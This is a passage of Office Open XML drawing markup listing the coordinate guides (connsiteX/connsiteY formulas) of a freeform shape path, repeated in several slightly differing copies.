              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1552307"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1552307"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1552307"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1552307"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1552307"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1552307"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1552307"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1552307"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1552307"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1552307"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1552307"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1552307"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1552307"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1552307"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1552307"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1552307"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1552307"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1552307"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1552307"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1552307"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1552307"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1552307"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1552307"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1552307"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1552307"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1552307"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1552307"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1552307"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1552307"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1552307"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1552307"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1552307"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1552307"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1552307"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1552307"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 1475444 h 1552307"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1475444 h 1552307"/>
              <a:gd name="connsiteX1" fmla="*/ 85420 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1525330 h 1552307"/>
              <a:gd name="connsiteX2" fmla="*/ 358599 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1541734 h 1552307"/>
              <a:gd name="connsiteX3" fmla="*/ 611906 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1537813 h 1552307"/>
              <a:gd name="connsiteX4" fmla="*/ 940788 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1506488 h 1552307"/>
              <a:gd name="connsiteX5" fmla="*/ 1032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1552307"/>
              <a:gd name="connsiteX6" fmla="*/ 1144951 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1528631 h 1552307"/>
              <a:gd name="connsiteX7" fmla="*/ 1408773 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1503055 h 1552307"/>
              <a:gd name="connsiteX8" fmla="*/ 1679869 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1477584 h 1552307"/>
              <a:gd name="connsiteX9" fmla="*/ 1704699 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1453746 h 1552307"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1452327 h 1552307"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1552307"/>
              <a:gd name="connsiteX12" fmla="*/ 2253639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1552307"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1552307"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1552307"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1552307"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1552307"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1552307"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1552307"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1552307"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1552307"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1552307"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1552307"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1552307"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1552307"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1552307"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1552307"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1552307"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1552307"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1552307"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1552307"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1552307"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1552307"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1552307"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1552307"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1552307"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1552307"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1552307"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1552307"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1552307"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1552307"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1552307"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1552307"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1552307"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1552307"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1552307"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1552307"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1552307"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1552307"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1552307"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1552307"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1552307"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1552307"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1552307"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1552307"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1552307"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1552307"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1552307"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1552307"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1552307"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1552307"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 1475444 h 1552307"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1475444 h 1552307"/>
              <a:gd name="connsiteX1" fmla="*/ 85420 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1525330 h 1552307"/>
              <a:gd name="connsiteX2" fmla="*/ 358599 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1541734 h 1552307"/>
              <a:gd name="connsiteX3" fmla="*/ 611906 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1537813 h 1552307"/>
              <a:gd name="connsiteX4" fmla="*/ 940788 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1506488 h 1552307"/>
              <a:gd name="connsiteX5" fmla="*/ 1032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1552307"/>
              <a:gd name="connsiteX6" fmla="*/ 1144951 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1524944 h 1552307"/>
              <a:gd name="connsiteX7" fmla="*/ 1408773 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1503055 h 1552307"/>
              <a:gd name="connsiteX8" fmla="*/ 1679869 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1477584 h 1552307"/>
              <a:gd name="connsiteX9" fmla="*/ 1704699 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1453746 h 1552307"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1452327 h 1552307"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1552307"/>
              <a:gd name="connsiteX12" fmla="*/ 2253639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1552307"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1552307"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1552307"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1552307"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1552307"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1552307"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1552307"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1552307"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1552307"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1552307"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1552307"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1552307"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1552307"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1552307"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1552307"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1552307"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1552307"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1552307"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1552307"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1552307"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1552307"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1552307"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1552307"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1552307"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1552307"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1552307"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1552307"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1552307"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1552307"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1552307"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1552307"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1552307"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1552307"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1552307"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1552307"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1552307"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1552307"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
              <a:gd name="connsiteY49" fmla="*/ 531129 h 1552307"/>
              <a:gd name="connsiteX50" fmla="*/ 7782741 w 9288370"/>
              <a:gd name="connsiteY50" fmla="*/ 455936 h 1552307"/>
              <a:gd name="connsiteX51" fmla="*/ 7952094 w 9288370"/>
              <a:gd name="connsiteY51" fmla="*/ 409302 h 1552307"/>
              <a:gd name="connsiteX52" fmla="*/ 8275980 w 9288370"/>
              <a:gd name="connsiteY52" fmla="*/ 267262 h 1552307"/>
              <a:gd name="connsiteX53" fmla="*/ 8428864 w 9288370"/>
              <a:gd name="connsiteY53" fmla="*/ 208471 h 1552307"/>
              <a:gd name="connsiteX54" fmla="*/ 8616510 w 9288370"/>
              <a:gd name="connsiteY54" fmla="*/ 161973 h 1552307"/>
              <a:gd name="connsiteX55" fmla="*/ 8826766 w 9288370"/>
              <a:gd name="connsiteY55" fmla="*/ 152111 h 1552307"/>
              <a:gd name="connsiteX56" fmla="*/ 8917647 w 9288370"/>
              <a:gd name="connsiteY56" fmla="*/ 112232 h 1552307"/>
              <a:gd name="connsiteX57" fmla="*/ 9098594 w 9288370"/>
              <a:gd name="connsiteY57" fmla="*/ 73185 h 1552307"/>
              <a:gd name="connsiteX58" fmla="*/ 9232990 w 9288370"/>
              <a:gd name="connsiteY58" fmla="*/ 24074 h 1552307"/>
              <a:gd name="connsiteX59" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY59" fmla="*/ 0 h 1552307"/>
              <a:gd name="connsiteX60" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY60" fmla="*/ 0 h 1552307"/>
              <a:gd name="connsiteX61" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY61" fmla="*/ 1475444 h 1552307"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 1475444 h 1552307"/>
              <a:gd name="connsiteX1" fmla="*/ 85420 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1525330 h 1552307"/>
              <a:gd name="connsiteX2" fmla="*/ 358599 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1541734 h 1552307"/>
              <a:gd name="connsiteX3" fmla="*/ 611906 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1537813 h 1552307"/>
              <a:gd name="connsiteX4" fmla="*/ 940788 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1506488 h 1552307"/>
              <a:gd name="connsiteX5" fmla="*/ 1032523 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1513858 h 1552307"/>
              <a:gd name="connsiteX6" fmla="*/ 1144951 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1524944 h 1552307"/>
              <a:gd name="connsiteX7" fmla="*/ 1408773 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1503055 h 1552307"/>
              <a:gd name="connsiteX8" fmla="*/ 1651466 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1459150 h 1552307"/>
              <a:gd name="connsiteX9" fmla="*/ 1704699 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1453746 h 1552307"/>
              <a:gd name="connsiteX10" fmla="*/ 1794234 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1452327 h 1552307"/>
              <a:gd name="connsiteX11" fmla="*/ 2101780 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1409907 h 1552307"/>
              <a:gd name="connsiteX12" fmla="*/ 2253639 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1396542 h 1552307"/>
              <a:gd name="connsiteX13" fmla="*/ 2623862 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1365980 h 1552307"/>
              <a:gd name="connsiteX14" fmla="*/ 2707413 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1359160 h 1552307"/>
              <a:gd name="connsiteX15" fmla="*/ 2843134 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1323561 h 1552307"/>
              <a:gd name="connsiteX16" fmla="*/ 2923804 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1314224 h 1552307"/>
              <a:gd name="connsiteX17" fmla="*/ 2953618 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1318186 h 1552307"/>
              <a:gd name="connsiteX18" fmla="*/ 2995816 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1318670 h 1552307"/>
              <a:gd name="connsiteX19" fmla="*/ 3352700 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1264183 h 1552307"/>
              <a:gd name="connsiteX20" fmla="*/ 3444611 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1236739 h 1552307"/>
              <a:gd name="connsiteX21" fmla="*/ 3650072 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 1217421 h 1552307"/>
              <a:gd name="connsiteX22" fmla="*/ 3707853 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 1241722 h 1552307"/>
              <a:gd name="connsiteX23" fmla="*/ 3925616 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 1253751 h 1552307"/>
              <a:gd name="connsiteX24" fmla="*/ 3954387 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 1263789 h 1552307"/>
              <a:gd name="connsiteX25" fmla="*/ 3995849 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 1272939 h 1552307"/>
              <a:gd name="connsiteX26" fmla="*/ 4067546 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 1294697 h 1552307"/>
              <a:gd name="connsiteX27" fmla="*/ 4190310 w 9288370"/>
              <a:gd name="connsiteY27" fmla="*/ 1307786 h 1552307"/>
              <a:gd name="connsiteX28" fmla="*/ 4230008 w 9288370"/>
              <a:gd name="connsiteY28" fmla="*/ 1303546 h 1552307"/>
              <a:gd name="connsiteX29" fmla="*/ 4575478 w 9288370"/>
              <a:gd name="connsiteY29" fmla="*/ 1261726 h 1552307"/>
              <a:gd name="connsiteX30" fmla="*/ 4650026 w 9288370"/>
              <a:gd name="connsiteY30" fmla="*/ 1265798 h 1552307"/>
              <a:gd name="connsiteX31" fmla="*/ 4792008 w 9288370"/>
              <a:gd name="connsiteY31" fmla="*/ 1243899 h 1552307"/>
              <a:gd name="connsiteX32" fmla="*/ 4954126 w 9288370"/>
              <a:gd name="connsiteY32" fmla="*/ 1204617 h 1552307"/>
              <a:gd name="connsiteX33" fmla="*/ 5309678 w 9288370"/>
              <a:gd name="connsiteY33" fmla="*/ 1128278 h 1552307"/>
              <a:gd name="connsiteX34" fmla="*/ 5474724 w 9288370"/>
              <a:gd name="connsiteY34" fmla="*/ 1091167 h 1552307"/>
              <a:gd name="connsiteX35" fmla="*/ 5612132 w 9288370"/>
              <a:gd name="connsiteY35" fmla="*/ 1051509 h 1552307"/>
              <a:gd name="connsiteX36" fmla="*/ 5776618 w 9288370"/>
              <a:gd name="connsiteY36" fmla="*/ 1053037 h 1552307"/>
              <a:gd name="connsiteX37" fmla="*/ 5785786 w 9288370"/>
              <a:gd name="connsiteY37" fmla="*/ 1051213 h 1552307"/>
              <a:gd name="connsiteX38" fmla="*/ 5829381 w 9288370"/>
              <a:gd name="connsiteY38" fmla="*/ 1046878 h 1552307"/>
              <a:gd name="connsiteX39" fmla="*/ 5943596 w 9288370"/>
              <a:gd name="connsiteY39" fmla="*/ 1043237 h 1552307"/>
              <a:gd name="connsiteX40" fmla="*/ 5985730 w 9288370"/>
              <a:gd name="connsiteY40" fmla="*/ 1035396 h 1552307"/>
              <a:gd name="connsiteX41" fmla="*/ 6103109 w 9288370"/>
              <a:gd name="connsiteY41" fmla="*/ 1019019 h 1552307"/>
              <a:gd name="connsiteX42" fmla="*/ 6222406 w 9288370"/>
              <a:gd name="connsiteY42" fmla="*/ 985341 h 1552307"/>
              <a:gd name="connsiteX43" fmla="*/ 6598672 w 9288370"/>
              <a:gd name="connsiteY43" fmla="*/ 902062 h 1552307"/>
              <a:gd name="connsiteX44" fmla="*/ 6766149 w 9288370"/>
              <a:gd name="connsiteY44" fmla="*/ 846132 h 1552307"/>
              <a:gd name="connsiteX45" fmla="*/ 6886312 w 9288370"/>
              <a:gd name="connsiteY45" fmla="*/ 781877 h 1552307"/>
              <a:gd name="connsiteX46" fmla="*/ 7006457 w 9288370"/>
              <a:gd name="connsiteY46" fmla="*/ 699758 h 1552307"/>
              <a:gd name="connsiteX47" fmla="*/ 7231643 w 9288370"/>
              <a:gd name="connsiteY47" fmla="*/ 640778 h 1552307"/>
              <a:gd name="connsiteX48" fmla="*/ 7363123 w 9288370"/>
              <a:gd name="connsiteY48" fmla="*/ 593682 h 1552307"/>
              <a:gd name="connsiteX49" fmla="*/ 7588368 w 9288370"/>
